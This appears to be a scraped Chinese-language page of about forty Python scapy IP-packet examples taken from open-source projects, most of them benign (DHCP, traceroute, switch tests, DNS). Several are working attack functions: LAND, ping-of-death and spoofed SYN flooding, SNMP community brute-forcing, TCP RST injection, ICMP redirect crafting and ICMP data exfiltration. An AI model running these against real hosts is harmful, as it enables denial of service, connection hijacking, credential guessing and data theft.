我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用scapy.all.IP。
def active_scan(self, target): req = 'M-SEARCH * HTTP/1.1\r\nHost:239.255.255.250:1900\r\nST:upnp:rootdevice\r\nMan:"ssdp:discover"\r\nMX:3\r\n\r\n' ip=IP(dst=target) udp=UDP(sport=random.randint(49152,65536), dport=1900) pck = ip/udp/req try: start = time.time() rep = sr1(pck, verbose=0,timeout=5) if rep[Raw]: results = rep[Raw].load else: pass except Exception as e: results = None #print e return results
def _send_to_target(self, data): ether = Ether(dst='ff:ff:ff:ff:ff:ff') ip = IP(src=self.host, dst='255.255.255.255') udp = UDP(sport=68, dport=self.port) payload = Raw(load=data) packet = str(ether / ip / udp / payload) self.logger.debug('Sending header+data to host: %s:%d' % (self.host, self.port)) self.socket.send(packet) self.logger.debug('Header+data sent to host')
def cmd_dhcp_discover(iface, timeout, verbose): conf.verb = False if iface: conf.iface = iface conf.checkIPaddr = False hw = get_if_raw_hwaddr(conf.iface) ether = Ether(dst="ff:ff:ff:ff:ff:ff") ip = IP(src="0.0.0.0",dst="255.255.255.255") udp = UDP(sport=68,dport=67) bootp = BOOTP(chaddr=hw) dhcp = DHCP(options=[("message-type","discover"),"end"]) dhcp_discover = ether / ip / udp / bootp / dhcp ans, unans = srp(dhcp_discover, multi=True, timeout=5) # Press CTRL-C after several seconds for _, pkt in ans: if verbose: print(pkt.show()) else: print(pkt.summary())
def callback(self, packet): flags = packet.sprintf("%TCP.flags%") proto = IP if IPv6 in packet: proto = IPv6 if flags == "A" and not self.ignore_packet(packet, proto): src_mac = packet[Ether].src dst_mac = packet[Ether].dst src_ip = packet[proto].src dst_ip = packet[proto].dst src_port = packet[TCP].sport dst_port = packet[TCP].dport seq = packet[TCP].seq ack = packet[TCP].ack if self.verbose: print("RST from %s:%s (%s) --> %s:%s (%s) w/ %s" % (src_ip, src_port, src_mac, dst_ip, dst_port, dst_mac, ack)) if self.noisy: self.send(self.build_packet(src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, seq, proto)) self.send(self.build_packet(dst_mac, src_mac, dst_ip, src_ip, dst_port, src_port, ack, proto))
def monlist_scan(self,target): data = "\x17\x00\x03\x2a" + "\x00" * 4 ip = IP(dst=target) udp=UDP(sport=random.randint(49152,65536),dport=123) a = Raw(load=data) pck = ip/udp/a n = 0 results = None #try: while (n < 3): rep = sr1(pck,verbose=0,timeout=5) if hasattr(rep,'answers'): results = 1 break elif not hasattr(rep,'answers') and (n < 3): #print "Pass ",n n = n + 1 else: results = None break pass #except KeyboardInterrupt: # sys.exit(0) #except Exception as e: # results = None #print e return results
def test_mtu_regular(exp_src_mac, exp_dst_mac, port_interface_mapping, a, create_str): fwd_pkt1 = Ether() / IP(dst='10.1.0.1') / TCP(sport=5793, dport=80) fwd_pkt2 = Ether() / IP(dst='10.1.0.34') / TCP(sport=5793, dport=80) fwd_pkt3 = Ether() / IP(dst='10.1.0.32') / TCP(sport=5793, dport=80) / Raw(create_str) exp_pkt1 = (Ether(src=exp_src_mac, dst=exp_dst_mac) / IP(dst='10.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80)) exp_pkt2 = (Ether(src=exp_src_mac, dst=exp_dst_mac) / IP(dst='10.1.0.34', ttl=fwd_pkt2[IP].ttl-1) / TCP(sport=5793, dport=80)) exp_pkt3 = (Ether(src=exp_src_mac, dst=exp_dst_mac) / IP(dst='10.1.0.32', ttl=fwd_pkt3[IP].ttl-1) / TCP(sport=5793, dport=80) / Raw(create_str)) pack = send_pkts_and_capture(port_interface_mapping, [{'port': 0, 'packet': fwd_pkt1}, {'port': 1, 'packet': fwd_pkt2}, {'port': 1, 'packet': fwd_pkt3}]) input_ports = {0, 1} output = create_port_seq_list([{'port': 2, 'packet': exp_pkt1}, {'port': 2, 'packet': exp_pkt2}, {'port': 3, 'packet': exp_pkt3}], pack, input_ports) return output
def test_mtu_failing(exp_src_mac, exp_dst_mac, port_interface_mapping, a, create_str): fwd_pkt1 = Ether() / IP(dst='10.1.0.1') / TCP(sport=5793, dport=80) fwd_pkt2 = Ether() / IP(dst='10.1.0.34') / TCP(sport=5793, dport=80) fwd_pkt3 = Ether() / IP(dst='10.1.0.32') / TCP(sport=5793, dport=80) / Raw(create_str) exp_pkt1 = (Ether(src=exp_src_mac, dst=exp_dst_mac) / IP(dst='10.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80)) exp_pkt2 = (Ether(src=exp_src_mac, dst=exp_dst_mac) / IP(dst='10.1.0.34', ttl=fwd_pkt2[IP].ttl-1) / TCP(sport=5793, dport=80)) exp_pkt3 = (Ether(src=exp_src_mac, dst=exp_dst_mac) / IP(dst='10.1.0.32', ttl=fwd_pkt3[IP].ttl-1) / TCP(sport=5793, dport=80) / Raw(create_str)) pack = send_pkts_and_capture(port_interface_mapping, [{'port': 0, 'packet': fwd_pkt1}, {'port': 1, 'packet': fwd_pkt2}, {'port': 1, 'packet': fwd_pkt3}]) input_ports = {0, 1} output = create_port_seq_list([{'port': 2, 'packet': exp_pkt1}, {'port': 2, 'packet': exp_pkt2}, {'port': 3, 'packet': exp_pkt3}], pack, input_ports) return output
def test_multicast_sa_da(a, port_interface_mapping, exp_src_mac, exp_dst_mac): fwd_pkt1 = Ether() / IP(src='10.1.0.3', dst='224.1.0.1') / TCP(sport=5793, dport=80) fwd_pkt2 = Ether() / IP(src='10.1.0.5', dst='224.1.0.1') / TCP(sport=5793, dport=80) exp_pkt1 = (Ether(src=exp_src_mac) / IP(src='10.1.0.3', dst='224.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80)) exp_pkt2 = (Ether(src=exp_src_mac) / IP(src='10.1.0.5',dst='224.1.0.1', ttl=fwd_pkt2[IP].ttl-1) / TCP(sport=5793, dport=80)) pack = send_pkts_and_capture(port_interface_mapping, [{'port': 0, 'packet': fwd_pkt1}, {'port': 1, 'packet': fwd_pkt2}]) input_ports = {0, 1} output = create_port_seq_list([{'port': 2, 'packet': exp_pkt1}, {'port': 3, 'packet': exp_pkt1}, {'port': 4, 'packet': exp_pkt2}, {'port': 5, 'packet': exp_pkt2}, {'port': 6, 'packet': exp_pkt2}], pack, input_ports) return output
def test_multicast_rpf(a, port_interface_mapping, exp_src_mac, exp_dst_mac): fwd_pkt1 = Ether() / IP(src='10.1.0.3', dst='224.1.0.1') / TCP(sport=5793, dport=80) fwd_pkt2 = Ether() / IP(src='10.1.0.5', dst='224.1.0.1') / TCP(sport=5793, dport=80) exp_pkt1 = (Ether(src=exp_src_mac) / IP(src='10.1.0.3', dst='224.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80)) exp_pkt2 = (Ether(src=exp_src_mac) / IP(src='10.1.0.5',dst='224.1.0.1', ttl=fwd_pkt2[IP].ttl-1) / TCP(sport=5793, dport=80)) # The ports 1 nad 0 are exchanged to check that the rpf and ingress port are different , # thus dropping the packets pack = send_pkts_and_capture(port_interface_mapping, [{'port': 1, 'packet': fwd_pkt1}, {'port': 0, 'packet': fwd_pkt2}]) input_ports = {0, 1} output = create_port_seq_list([], pack, input_ports) return output
def send_dhcp_over_qvb(self, port_id, port_mac): """Send DHCP Discovery over qvb device. """ qvb_device = utils.get_vif_name(constants.QVB_DEVICE_PREFIX, port_id) ethernet = scapy.Ether(dst='ff:ff:ff:ff:ff:ff', src=port_mac, type=0x800) ip = scapy.IP(src='0.0.0.0', dst='255.255.255.255') udp = scapy.UDP(sport=68, dport=67) port_mac_t = tuple(map(lambda x: int(x, 16), port_mac.split(':'))) hw = struct.pack('6B', *port_mac_t) bootp = scapy.BOOTP(chaddr=hw, flags=1) dhcp = scapy.DHCP(options=[("message-type", "discover"), "end"]) packet = ethernet / ip / udp / bootp / dhcp scapy.sendp(packet, iface=qvb_device)
def test_get_dhcp_mt(self): dhcp = scapy.DHCP(options=[("message-type", "discover"), "end"]) pkt = scapy.Ether() / scapy.IP() / scapy.UDP() / scapy.BOOTP() / dhcp message = self.scapy_dri.get_dhcp_mt(str(pkt)) self.assertIn(message, constants.DHCP_MESSATE_TYPE)
def build_icmp(self): pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\ IP(src=self.target, dst=self.gateway)/UDP() return pkt
def send_packet(protocol=None, src_ip=None, src_port=None, flags=None, dst_ip=None, dst_port=None, iface=None): """Modify and send an IP packet.""" if protocol == 'tcp': packet = IP(src=src_ip, dst=dst_ip)/TCP(flags=flags, sport=src_port, dport=dst_port) elif protocol == 'udp': if flags: raise Exception(" Flags are not supported for udp") packet = IP(src=src_ip, dst=dst_ip)/UDP(sport=src_port, dport=dst_port) else: raise Exception("Unknown protocol %s" % protocol) send(packet, iface=iface)
def cmd_traceroute(ip, port, iface): conf.verb = False if iface: conf.iface = iface pkts = IP(dst=ip, ttl=(1, 16)) / TCP(dport=port) for pkt in pkts: ans = sr1(pkt, timeout=1, iface=conf.iface) if not ans: print('.') continue print(ans.summary()) if TCP in ans and ans[TCP].flags == 18: break return True
def cmd_protoscan(ip, verbose): conf.verb = False #pkts = IP(dst=ip) / TCP(flags=(0, 255), dport=port) pkts = IP(dst=ip, proto=(0, 255)) # / TCP(flags=(0, 255), dport=port) out = "{:>8} -> {:<8}" for pkt in pkts: #if not flags or all(i in pkt.sprintf(r"%TCP.flags%") for i in flags): print(pkt.show2()) ans = sr1(pkt, timeout=0.2) if ans: #if not rflags or all(i in ans.sprintf(r"%TCP.flags%") for i in rflags): #print(out.format(pkt.sprintf(r"%TCP.flags%"), ans.sprintf(r"%TCP.flags%"))) print(ans.show()) return True
def cmd_ipscan(ip, iface, sleeptime, timeout, verbose): if verbose: logging.basicConfig(level=logging.INFO, format='%(message)s') conf.verb = False if iface: conf.iface = iface ans,unans=sr(IP(dst=ip, proto=(0,255))/"SCAPY",retry=0,timeout=2, verbose=True) for s,r in ans: print(r.summary()) if not ICMP in r: r.show()
def cmd_snmp_crack(ip, port, stop, verbose): FILEDIR = os.path.dirname(os.path.abspath(__file__)) DATADIR = os.path.abspath(os.path.join(FILEDIR, '../data')) COMMFILE = Path(os.path.abspath(os.path.join(DATADIR, 'dict_snmp.txt'))) with COMMFILE.open() as cf: communities = cf.read().split('\n') conf.verb = False pkt = IP(dst=ip)/UDP(sport=port, dport=port)/SNMP(community="public", PDU=SNMPget(varbindlist=[SNMPvarbind(oid=ASN1_OID("1.3.6.1"))])) for community in communities: if verbose: print('.', end='') sys.stdout.flush() pkt[SNMP].community=community ans = sr1(pkt, timeout=0.5, verbose=0) if ans and UDP in ans: print('\nCommunity found:', community) if stop: break return True
def update_next_packet(self): packet = s.sniff(count=1) # filter = "tcp.len > 0", packet = packet[0] if s.IP not in packet: return ip_send = packet[s.IP].src ip_rec = packet[s.IP].dst if ip_send != self.our_ip and ip_rec != self.our_ip: return print packet.summary() if make_stamp(packet) is not None: ip_send, ip_rec, protocol = make_stamp(packet) three_tuple = [ip_send, ip_rec, protocol] stamp = self.decide_stamp(three_tuple) if self.sessions.get(stamp) is None: threading.Thread(target=self.set_session, args=[packet, stamp, self.our_ip]).start() else: threading.Thread(target=self.sessions[stamp].update_session, args=[packet]).start() # in case we done working on connection # we will order by time and add to global list if self.sessions[stamp].got_fin is True: to_add = self.sessions.pop(stamp) sorted(to_add.income, key=key_func) sorted(to_add.outcome, key=key_func) sorted(to_add.combined, key=key_func) lst.add(to_add) else: print "[Error] - Shit happens"
def cap_session(pcap_path): capture = s.rdpcap(pcap_path) # TODO when go live change to session capture first = True curr_session = None session_info = [0, ] * 3 for pkt in capture: if not pkt.haslayer(s.TCP) and not pkt.haslayer(s.IP) and pkt.len <= 0: continue if first: first = False if is_client(pkt): session_info[0] = pkt[s.IP].src session_info[1] = pkt[s.IP].dst session_info[2] = "TCP" curr_session = Session(pkt, session_info, session_info[0]) else: session_info[0] = pkt[s.IP].dst session_info[1] = pkt[s.IP].src session_info[2] = "TCP" curr_session = Session(pkt, session_info, session_info[0]) else: curr_session.update_session(pkt) return curr_session
def runTest(self): pkt = scapy2.Ether(src="e4:1d:2d:a5:f3:ac", dst="00:02:03:04:05:00") pkt /= scapy2.IP(src="10.0.0.1", dst="10.0.0.0") # get L4 port number port_number = testutils.test_params_get("port_number") port = port_number["port_number"] pkt /= scapy2.TCP(sport = int(port)) pkt /= ("badabadaboom") # get packets number count = testutils.test_params_get("count") pack_number = count["count"] # send packets send(self, 0, pkt, int(pack_number))
def test_icmp(self): def process_response(echo_reply, dest): ans, unans = echo_reply if ans: log.msg("Received echo reply from %s: %s" % (dest, ans)) else: log.msg("No reply was received from %s. Possible censorship event." % dest) log.debug("Unanswered packets: %s" % unans) self.report[dest] = echo_reply for label, data in self.destinations.items(): reply = sr1(IP(dst=lebal) / ICMP()) process = process_reponse(reply, label) #(ans, unans) = ping #self.destinations[self.dst].update({'ans': ans, # 'unans': unans, # 'response_packet': ping}) #return ping #return reply
def test_a_lookup(self): question = IP(dst=self.resolverAddr) / \ UDP() / \ DNS(rd=1, qd=DNSQR(qtype="A", qclass="IN", qname=self.hostname)) log.msg("Performing query to %s with %s:%s" % (self.hostname, self.resolverAddr, self.resolverPort)) yield self.sr1(question)
def test_control_a_lookup(self): question = IP(dst=self.controlResolverAddr) / \ UDP() / \ DNS(rd=1, qd=DNSQR(qtype="A", qclass="IN", qname=self.hostname)) log.msg("Performing query to %s with %s:%s" % (self.hostname, self.controlResolverAddr, self.controlResolverPort)) yield self.sr1(question)
def test_represent_scapy(self): data = IP() / UDP() yaml.dump_all([data], Dumper=OSafeDumper)
def test_send_packet_with_answer(self): from scapy.all import IP, TCP sender = txscapy.ScapySender() self.scapy_factory.registerProtocol(sender) packet_sent = IP(dst='8.8.8.8', src='127.0.0.1') / TCP(dport=53, sport=5300) packet_received = IP(dst='127.0.0.1', src='8.8.8.8') / TCP(sport=53, dport=5300) d = sender.startSending([packet_sent]) self.scapy_factory.super_socket.send.assert_called_with(packet_sent) sender.packetReceived(packet_received) result = yield d assert result[0][0][0] == packet_sent assert result[0][0][1] == packet_received
def add_eth_ip_udp_headers(dport): eth = Ether(src='0C:C4:7A:A3:25:34', dst='0C:C4:7A:A3:25:35') ip = IP(dst='10.0.0.2', ttl=64) udp = UDP(sport=65231, dport=dport) pkt = eth / ip / udp return pkt
def send_packet(protocol=None, src_ip=None, src_port=None, flags=None, dst_ip=None, dst_port=None, iface=None): """ Modify and sned an IP packet. """ if protocol == 'tcp': packet = IP(src=src_ip, dst=dst_ip)/TCP(flags=flags, sport=src_port, dport=dst_port) elif protocol == 'udp': if flags: raise Exception(" Flags are not suppored for udp") packet = IP(src=src_ip, dst=dst_ip)/UDP(sport=src_port, dport=dst_port) else: raise Exception("Unknown protocol %s" % protocol) send(packet, iface=iface)
def test_ttl_cases(exp_src_mac, exp_dst_mac, port_interface_mapping, a): fwd_pkt1 = Ether() / IP(dst='10.1.0.1') / TCP(sport=5793, dport=80) fwd_pkt2 = Ether() / IP(dst='10.1.0.34', ttl =1) / TCP(sport=5793, dport=80) fwd_pkt3 = Ether() / IP(dst='10.1.0.32', ttl=0) / TCP(sport=5793, dport=80) exp_pkt1 = (Ether(src=exp_src_mac, dst=exp_dst_mac) / IP(dst='10.1.0.1', ttl=fwd_pkt1[IP].ttl-1) / TCP(sport=5793, dport=80)) pack = send_pkts_and_capture(port_interface_mapping, [{'port': 0, 'packet': fwd_pkt1}, {'port': 1, 'packet': fwd_pkt2}, {'port': 1, 'packet': fwd_pkt3}]) input_ports = {0, 1} output = create_port_seq_list([{'port': 2, 'packet': exp_pkt1}], pack, input_ports) return output
def _parse_ip(ip): ''' ''' try: x = socket.inet_aton(ip) return socket.inet_ntoa(x) except: Sploit.parse_error("'%s' is an invalid IP address" % ip)
def generator(self, n, filename): time = 0.00114108 * n + 0.157758 minutes = time/60 print('Generating packets, it will take %s seconds, moreless (%s, minutes)' % (time, minutes)) pkgs = [IP(dst='10.0.0.1')/ICMP() for i in range(n)] wrpcap(filename, pkgs) print('%s packets generated.' % (n))
def cmd_land(ip, count, port, iface, verbose): conf.verb = False if iface: conf.iface = iface layer3 = IP() layer3.dst = ip layer3.src = ip layer4 = TCP() layer4.dport = port layer4.sport = port pkt = layer3 / layer4 counter = 0 while True: send(pkt) counter += 1 if verbose: print(pkt.summary()) else: print('.', end='') sys.stdout.flush() if count != 0 and counter == count: break return True
def cmd_isn(ip, port, count, iface, graph, verbose): conf.verb = False if iface: conf.iface = iface isn_values = [] for _ in range(count): pkt = IP(dst=ip)/TCP(sport=RandShort(), dport=port, flags="S") ans = sr1(pkt, timeout=0.5) if ans: send(IP(dst=ip)/TCP(sport=pkt[TCP].sport, dport=port, ack=ans[TCP].seq + 1, flags='A')) isn_values.append(ans[TCP].seq) if verbose: ans.show2() if graph: try: import matplotlib.pyplot as plt except ImportError: print("To graph support, install matplotlib") return 1 plt.plot(range(len(isn_values)), isn_values, 'ro') plt.show() else: for v in isn_values: print(v) return True
def ping_of_death(self, target): from scapy.all import IP, ICMP, send src = "%i.%i.%i.%i" % ( random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) ip_hdr = IP(src, target) _packet = ip_hdr / ICMP() / (str(os.urandom(65500))) send(_packet)
def syn_flood(self, target, port): from scapy.all import IP, TCP, send i = IP() i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254)) i.dst = target t = TCP() t.sport = random.randint(1, 65500) t.dport = port t.flags = 'S' send(i / t, verbose=0)
def get_gateway(self): p = sr1(IP(dst="www.google.com", ttl=0) / ICMP() / "X", verbose=0) return p.src
def __init__(self): self.ip = '' # IP of Host that the server is running on self.port = 44353 # Host's port
def ignore_packet(self, packet, proto): src_ip = packet[proto].src dst_ip = packet[proto].dst src_port = packet[TCP].sport dst_port = packet[TCP].dport # Target or allow by IP if (src_ip in self.allow or dst_ip in self.allow) or (src_ip in self.allow_src) or (dst_ip in self.allow_dst): return True elif (self.target and ( self.src_ip not in self.target and self.dst_ip not in self.target)) or (self.target_src and not src_ip in self.target_src) or (self.target_dst and not dst_ip in self.target_dst): return True # Target or allow by Port if (src_port in self.allow_ports or dst_port in self.allow_ports) or (src_port in self.allow_sport) or (dst_port in self.allow_dport): return True elif (self.target_ports and (not src_port in self.target_ports and not dst_port in self.target_ports)) or (self.target_sport and not src_port in self.target_sport) or (self.target_dport and not dst_port in self.target_dport): return True # Target randomly if self.randomize == "often" and randint(1, 10) < 2: return True elif self.randomize == "half" and randint(1, 10) < 5: return True elif self.randomize == "seldom" and randint(1, 10) < 8: return True else: return False ############################################################### # Scapy # ###############################################################
def build_packet(self, src_mac, dst_mac, src_ip, dst_ip, src_port, dst_port, seq, proto): eth = Ether(src=src_mac, dst=dst_mac, type=0x800) if proto == IP: ip = IP(src=src_ip, dst=dst_ip) elif proto == IPv6: ip = IPv6(src=src_ip, dst=dst_ip) else: return str(eth) #if unknown L2 protocol, send back dud ether packet tcp = TCP(sport=src_port, dport=dst_port, seq=seq, flags="R") return str(eth/ip/tcp)
def launch(self): send(IP(src=self.get_value("target"), dst=self.get_value("target"))/TCP(sport=self.get_value("port"), dport=self.get_value("port")), count=self.get_value("size"))
def heartbeat_call(self, event): # Send a packet to every WiFiTrilat server. for host in [s[1:s.find('/WiFi')] for s in self.client.discover()]: #sr(IP(dst=host)/ICMP(), iface=self.interface) cli.execute(command='ping -c 4 %s' % host, wait=False, shellexec=True)
def send(data): data = base64.b64encode(data) app_exfiltrate.log_message( 'info', "[icmp] Sending {} bytes with ICMP packet".format(len(data))) scapy.sendp(scapy.Ether() / scapy.IP(dst=config['target']) / scapy.ICMP() / data, verbose=0)
def make_stamp(pkt): if s.IP in pkt: ip_send = pkt[s.IP].src ip_rec = pkt[s.IP].dst else: return None if s.TCP in pkt: # port_send = pkt[TCP].sport # port_rec = pkt[TCP].dport protocol = "TCP" elif s.UDP in pkt: # port_send = pkt[UDP].sport # port_rec = pkt[UDP].dport protocol = "UDP" elif s.ICMP in pkt: # port_send = 1 # pkt[ICMP].sport # port_rec = 1 # pkt[ICMP].dport protocol = "ICMP" else: return None # if not TCP or UDP or ICMP return ip_send, ip_rec, protocol
def get_max_delay(session, our_ip): cnt_c = 0 cnt_s = 0 curr = session.combined[0] for i in xrange(1, len(session.combined)): pkt_tuple = session.combined[i] prev = curr curr = pkt_tuple if curr[1] - prev[1] > 1: if curr[0][s.IP].src == our_ip: cnt_c += 1 else: cnt_s += 1 return cnt_c, cnt_s